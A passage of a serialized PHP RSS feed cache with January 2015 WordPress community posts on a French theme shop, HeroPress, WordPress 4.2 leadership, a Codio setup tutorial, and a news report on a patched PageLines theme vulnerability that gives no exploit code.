updates.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 23 Jan 2015 20:02:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"WPTavern: New French Theme Shop Hexagone Launches with Free and Commercial WordPress Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37748\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"http://wptavern.com/new-french-theme-shop-hexagone-launches-with-free-and-commercial-wordpress-themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3087:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/hexagone-themes.jpg\" rel=\"prettyphoto[37748]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/hexagone-themes.jpg?resize=1025%2C309\" alt=\"hexagone-themes\" class=\"aligncenter size-full wp-image-37761\" /></a></p>\n<p>Earlier this week, <a href=\"http://wptheming.com/\" target=\"_blank\">WP Theming</a>&#8216;s Devin Price <a href=\"http://wptheming.com/2015/01/announcing-hexagone/\" target=\"_blank\">announced</a> a partnership with French translation specialist <a href=\"https://twitter.com/fxbenard\" target=\"_blank\">Fx Benard</a> on a new theme shop aimed at the French-speaking WordPress community. <a href=\"https://hexagone.io/\" target=\"_blank\">Hexagone</a> is now open for business with four <a href=\"https://hexagone.io/boutique/\" target=\"_blank\">products</a> available &#8211; two commercial themes and two free themes.</p>\n<p>The duo plan to expand to offer more &#8220;products, support, content, and documentation in the language of Molière.&#8221; Price joined forces with Bernard after successfully working with him on translation workflows and French translations for DevPress themes. The shop&#8217;s name is derived from &#8220;l’Hexagone,&#8221; which is often used to describe France&#8217;s geographical shape.</p>\n<p>Price and Bernard are aiming to make Hexagone the leading source for WordPress themes and tutorials in French. &#8220;There aren&#8217;t too many companies in this space yet, and we’re hoping a great company that’s devoted to the ideals of open-source can do well,&#8221; he said. <strong>&#8220;There&#8217;s 75 million native speakers of French and about 338 million total.&#8221;</strong></p>\n<p>While the vast majority of theme shops conduct business and support in English, the number of non-English speaking WordPress users is on the rise. Hexagone&#8217;s founders believe that the market is ripe for a theme shop that can provide French language-specific products, documentation, articles, and support. &#8220;If it takes off, we’d love to hire some writers and developers to work with us full-time,&#8221; Price said.</p>\n<p>Hexagone <a href=\"http://wptheming.com/2015/01/selling-products-with-wordpress/\" target=\"_blank\">published</a> a detailed writeup of the technologies used to build the online storefront. The site is powered by Easy Digital Downloads, Stripe, Gravity Forms, and their <a href=\"https://hexagone.io/boutique/reunion/\" target=\"_blank\">Reunion</a> theme. The article offers insight on the different types of plugins and technologies useful for selling digital products with WordPress.</p>\n<p>If Hexagone is successful, it will demonstrate that there is room in the wide world of WordPress themes for more language-niche theme shops. WordPress&#8217; continued international success depends on the ability for non-English speakers to be able to find documentation and support in their own native languages. <a href=\"https://hexagone.io/\" target=\"_blank\">Hexagone</a> is setting out to prove that the French market is ready for it.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 22 Jan 2015 21:49:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Matt: Scaling PAPER for Kim\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44619\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"http://ma.tt/2015/01/scaling-paper-for-kim/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:615:\"<p>I always like reading <a href=\"http://www.ftrain.com/\">Paul Ford&#8217;s writing</a>, and this one about <a href=\"https://medium.com/message/how-paper-magazines-web-engineers-scaled-kim-kardashians-back-end-sfw-6367f8d37688\">How PAPER Magazine’s web engineers scaled Kim Kardashian’s back-end (SFW)</a> is funny and accessible. I learned that people still use Movable Type. Also if PAPER used <a href=\"http://vip.wordpress.com/\">VIP</a>, the story would be short and boring:</p>\n<ol>\n<li>Wake up, press the publish button.</li>\n<li>Watch the stats go crazy. Sip some bourbon.</li>\n<li>Go to sleep.</li>\n</ol>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 22 Jan 2015 21:02:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: HeroPress Launches Kickstarter Campaign to Highlight WordPress Developers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37724\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/heropress-launches-kickstarter-campaign-to-highlight-wordpress-developers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3349:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/heropress.jpg\" rel=\"prettyphoto[37724]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/heropress.jpg?resize=956%2C423\" alt=\"heropress\" class=\"aligncenter size-full wp-image-37733\" /></a></p>\n<p><a href=\"http://heropress.com/\" target=\"_blank\">HeroPress</a> is a new WordPress community initiative with a <a href=\"https://www.kickstarter.com/projects/heropress/heropress-developing-the-wordpress-heroes-of-the-w\" target=\"_blank\">Kickstarter campaign</a>, created by Topher DeRosia, a developer for XWP. Its mission is to &#8220;develop the WordPress heroes of the world by sharing the accumulated wisdom of the community.&#8221;</p>\n<p>While looking for a way to give back to the WordPress community, DeRosia spoke with hundreds of people, many of whom live in different time zones around the world.</p>\n<p>&#8220;I began to notice a common problem,&#8221; he said. &#8220;Many of them felt disconnected from the greater WordPress community &#8211; the Western WordPress community. For some it was a language issue, for others location, and still others simply not understanding culture.&#8221;</p>\n<p>The initiative&#8217;s $60K AUD (~$48,000 USD) Kickstarter goal is intended to fund video production, branding, and marketing for DeRosia and his team to film six episodes, spotlighting WordPress developers.</p>\n<p>&#8220;These presentations will share the wisdom these WordPress Heroes have acquired through their successes and failures with one goal in mind: to provide information, insight, and inspiration to WordPress developers all around the world that will help them become WordPress Heroes,&#8221; DeRosia writes in the campaign description.</p>\n<p>Turning developers into &#8220;WordPress heroes&#8221; is a rather nebulous goal that may not easily catch on with the general community. However, the fact that international WordPress developers feel disconnected is a real issue that could use more attention.</p>\n<p>Many WordPress professionals who would like to attend some of the larger community events are denied visas or unable to afford the expense. Cultural misunderstandings across borders are quite common in the community, which is growing fastest in the non-English speaking world.</p>\n<p>This initiative recognizes a real problem, but the marketing and approach could use some additional refining. HeroPress has already received sharp criticism from one of WordPress&#8217; lead developers for its male-only speaker lineup and use of the term &#8220;hero:&#8221;</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/pippinsplugins\">@pippinsplugins</a> unambiguous hero worship in an open source community (and of six males) doesn\'t seem like much of an achievement.</p>\n<p>&mdash; Andrew Nacin (@nacin) <a href=\"https://twitter.com/nacin/status/558347928977145856\">January 22, 2015</a></p></blockquote>\n<p></p>\n<p>DeRosia has a passion for mentoring people and hopes to encourage developers around the world by highlighting their work and expertise. It&#8217;s not yet clear whether video production to highlight &#8220;heroes&#8221; will resonate with the WordPress community, but the campaign has already received $8,565 AUD of its $60K goal. DeRosia has 24 days remaining to get HeroPress fully funded.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 22 Jan 2015 20:07:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"WPTavern: High Risk Security Vulnerability Discovered and Patched in Pagelines and Platform Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37702\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:108:\"http://wptavern.com/high-risk-security-vulnerability-discovered-and-patched-in-pagelines-and-platform-themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3131:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/pagelines.jpg\" rel=\"prettyphoto[37702]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/pagelines.jpg?resize=1000%2C450\" alt=\"pagelines\" class=\"aligncenter size-full wp-image-37721\" /></a></p>\n<p>The <a href=\"https://wordpress.org/themes/pagelines\" target=\"_blank\">PageLines</a> and <a href=\"https://wordpress.org/themes/platform\" target=\"_blank\">Platform</a> drag-and-drop themes for WordPress have recently been patched for a privilege escalation vulnerability and a remote code execution issue discovered by Sucuri during a routine audit. Sucuri is classifying the vulnerabilities as high risk, with a <a href=\"http://en.wikipedia.org/wiki/DREAD:_Risk_assessment_model\" target=\"_blank\">DREAD</a> score of 9/10, and recommends that users update their copies of the themes as soon as possible.</p>\n<p>The privilege escalation vulnerability is present in both themes, where a WordPress AJAX hook is used to modify a set of options. &#8220;Because all wp_ajax_ hooks are usable by any logged-in users (no matter what privileges they have on the target site), a subscribed user could use this hook to overwrite any options located on WordPress options database table,&#8221; Sucuri explained in the <a href=\"http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html\" target=\"_blank\">advisory</a>.</p>\n<p>This makes it possible for an attacker to grant all new users the administrator role. However, a user&#8217;s site must be open for registration in order for this kind of attack to be successful.</p>\n<p>The free versions of these themes have been downloaded from WordPress.org more than half a million times apiece, so there are likely to be thousands of WordPress users who could potentially be affected. Fortunately, a patch is already available. The WordPress Theme Review team worked quickly to fast-track the two patched versions of the themes, so anyone who has them installed will see an update notice in the WordPress admin. Users who purchased the commercial versions will also see an update available.</p>\n<p>If you are currently unable or unwilling to update, a plugin is available that will block exploits for the legacy themes. You can <a href=\"https://gist.github.com/Pross/769de6e9219705041c67\">download it from GitHub</a> and install it like any other plugin if you need a quick fix to buy you time to update.</p>\n<p>&#8220;To clarify, this is ONLY in legacy version of these two PageLines products (Framework and Platform),&#8221; PageLines founder Andrew Powers commented on the advisory. &#8220;Since this was first reported to us three days ago, we&#8217;ve immediately patched those files and updated them on WordPress.org, GitHub and anywhere on PageLines servers.&#8221;</p>\n<p>So far, Powers has no knowledge of the issue having been exploited. The fact that the danger is limited to sites with open registration should also cut down on the number of vulnerable sites. Now that the security issue is public, it&#8217;s imperative that users update immediately.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 22 Jan 2015 19:07:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"Matt: New Simplenote\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44613\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"http://ma.tt/2015/01/new-simplenote/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:425:\"<p><a href=\"http://simplenote.com/2015/01/21/new-simplenote-app-updates-for-ios-android-and-mac/\">New Simplenote App Updates for iOS, Android, and Mac</a>, some nice iterations. <ins datetime=\"2015-01-22T18:30:50+00:00\">Update: Simplenote for Android was <a href=\"http://www.theverge.com/2015/1/22/7871293/best-material-design-android-apps\">just highlighted by The Verge as one of the best Material design apps</a>.</ins></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 22 Jan 2015 00:27:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"WPTavern: Drew Jaynes to Lead WordPress 4.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37669\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2490:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/drew-jaynes.jpg\" rel=\"prettyphoto[37669]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/drew-jaynes.jpg?resize=256%2C256\" alt=\"photo credit: 10up\" class=\"size-full wp-image-37692\" /></a>photo credit: <a href=\"http://10up.com/about/#employee-drew-jaynes\">10up</a>\n<p>WordPress 4.2 development officially kicked off today at the regularly scheduled core development meeting. Andrew Nacin announced that 10up engineer <a href=\"http://werdswords.com/\" target=\"_blank\">Drew Jaynes</a> will be leading the release.</p>\n<p>Jaynes, who has contributed to every major release since 3.3, recently led the initiative to create inline documentation for every hook in WordPress. He will be accompanied by Scott Taylor, who will help guide core feature plugin development for the media and image efforts that will be in motion throughout 2015.</p>\n<p>The WordPress core team is planning three releases this year. &#8220;At the moment, that looks like one in April, one in August, and one in early December,&#8221; Nacin said. He anticipates that the WP REST API will see the light of day in 4.3 or 4.4, due later this year.</p>\n<p>Jaynes opened the meeting with discussion on <a href=\"https://wordpress.slack.com/archives/core/p1421875969001302\" target=\"_blank\">possible candidates for features in 4.2</a>, which are likely to include <a href=\"https://wordpress.org/plugins/press-this/\" target=\"_blank\">Press This</a>, <a href=\"https://wordpress.org/plugins/customizer-theme-switcher/\" target=\"_blank\">Theme Switcher</a>, and <a href=\"https://core.trac.wordpress.org/ticket/29820\" target=\"_blank\">Shiny Updates</a> (smoother installation and updating of plugins and themes). The merge deadline for feature plugins is approximately two weeks away.</p>\n<p>&#8220;In addition to feature plugins, I&#8217;d like the general focus to be on polishing up some of our existing UIs in terms of mobile and accessibility wherever we can,&#8221; Jaynes said. &#8220;Seems like there&#8217;s tickets hanging out there we could get some wins on.&#8221;</p>\n<p>A 4.1.1 maintenance release is on its way this week or possibly early next week. The <a href=\"https://make.wordpress.org/core/version-4-2-project-schedule/\" target=\"_blank\">4.2 project schedule</a> is now updated with tentative dates for the release. The team is targeting April 8th for the official release, with the first beta planned for the week of February 25th.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Jan 2015 22:35:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"WPTavern: How to Set Up a WordPress Development Site with Codio’s Free Cloud-Based IDE\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37626\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"http://wptavern.com/how-to-set-up-a-wordpress-development-site-with-codios-free-cloud-based-ide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7395:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-new-logo.jpg\" rel=\"prettyphoto[37626]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-new-logo.jpg?resize=1020%2C469\" alt=\"codio-new-logo\" class=\"aligncenter size-full wp-image-37640\" /></a></p>\n<p><a href=\"https://codio.com/\" target=\"_blank\">Codio</a> is a cloud-based IDE that is primarily used in the education sector but is also available to developer professionals. The service provides instant coding environments with support for code editing and a large array of popular programming languages and software components.</p>\n<p>By making the IDE available to users through the browser, Codio eliminates the hassle that educators experience when setting up development environments for students. Projects created in Codio are accessible both in the classroom and at home, which helps students continue their learning outside of the classroom.</p>\n<p>Codio offers a <a href=\"https://codio.com/pricing/\" target=\"_blank\">free account</a> that gives you 256 MB memory per project and 2 GB storage per project. Other pricing tiers cater to teachers, students, schools, universities, and professionals. However, the free account is perfect for creating a quick development site with WordPress, and you can set it up in under five minutes.</p>\n<h2>Step 1: Create a New Project</h2>\n<p>After creating an account with Codio, you&#8217;ll be greeted with a prompt to create a new project. Click through to get started with a new project that will contain your development environment.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-projects-screen.png\" rel=\"prettyphoto[37626]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-projects-screen.png?resize=1025%2C812\" alt=\"codio-projects-screen\" class=\"aligncenter size-full wp-image-37632\" /></a></p>\n<p>You&#8217;ll now have the opportunity to choose from three different starting points: an empty project, a starter pack, or a GitHub import. Select &#8220;a starter pack.&#8221;</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-create-project.png\" rel=\"prettyphoto[37626]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-create-project.png?resize=1025%2C724\" alt=\"codio-create-project\" class=\"aligncenter size-full wp-image-37631\" /></a></p>\n<p>This will take you to a page that lists all of Codio&#8217;s certified starter packs, which help you easily get started with technologies like Angular, Node + Express, Drupal, Ruby on Rails, and more. There are a dozen starter packs that are certified and supported by the Codio team.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-starter-packs.png\" rel=\"prettyphoto[37626]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-starter-packs.png?resize=1025%2C724\" alt=\"codio-starter-packs\" class=\"aligncenter size-full wp-image-37633\" /></a></p>\n<p>Fortunately, there&#8217;s a starter pack for WordPress that will automatically set up MySQL, Apache, and PHP. This makes the setup process quick and hassle-free, and you&#8217;ll be using the latest version of WordPress in just a couple minutes.</p>\n<p>After you select the WordPress starter pack, you&#8217;ll be returned to the project page. Free accounts are limited to public visibility on projects, so you may need to upgrade to the Pro plan if you require private projects.</p>\n<h2>Step 2: Configure WordPress</h2>\n<p>After you complete the project setup, you&#8217;ll be dumped out onto the readme file for your project where you&#8217;ll find instructions for configuring and installing WordPress. If you&#8217;re bothered by non-capital P&#8217;s in WordPress, steady your nerves and remember that someone made this for you to use for free.</p>\n<p>Navigate to &#8220;Configure Project&#8221; in the top menu and then follow the instructions in the terminal to run the configuration script. When prompted for your password, press Enter. This is the only action you need to take during the process.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-configure-project.png\" rel=\"prettyphoto[37626]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-configure-project.png?resize=1025%2C534\" alt=\"codio-configure-project\" class=\"aligncenter size-full wp-image-37630\" /></a></p>\n<h2>Step 3: Install WordPress</h2>\n<p>Once configuration is complete, navigate to &#8220;WordPress Login&#8221; in the top menu. This will take you through the normal installation process.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-wordpress-install.png\" rel=\"prettyphoto[37626]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-wordpress-install.png?resize=1025%2C658\" alt=\"codio-wordpress-install\" class=\"aligncenter size-full wp-image-37635\" /></a></p>\n<p>Now you should be able to log in at the following URL:</p>\n<p><code>http://theory-opera.codio.io:3000/wordpress/wp-admin/</code></p>\n<h2>Step 4: Activate the Permalink Fix &#038; Disable Canonical Redirects Pack Plugin</h2>\n<p>Once you&#8217;re in, the last required step is to go straight to plugins and activate the <a href=\"https://wordpress.org/plugins/permalink-fix-disable-canonical-redirects-pack/\" target=\"_blank\">Permalink Fix &amp; Disable Canonical Redirects Pack</a> plugin, which you&#8217;ll find pre-installed. Visit the front end like you normally would and you&#8217;ll see your shiny new WordPress site.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-wordpress-frontend.png\" rel=\"prettyphoto[37626]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/codio-wordpress-frontend.png?resize=1025%2C569\" alt=\"codio-wordpress-frontend\" class=\"aligncenter size-full wp-image-37634\" /></a></p>\n<p>The URL for your site will look something like this:</p>\n<p><code>http://theory-opera.codio.io:3000/wordpress/</code></p>\n<p>Within the Codio interface you can easily edit WordPress core, theme, and plugin files, as well as upload new files. If you have WordPress projects hosted on GitHub, you can easily import those into Codio to make changes and push those changes back to the repository.</p>\n<p>The cloud-based IDE is very similar to using <a 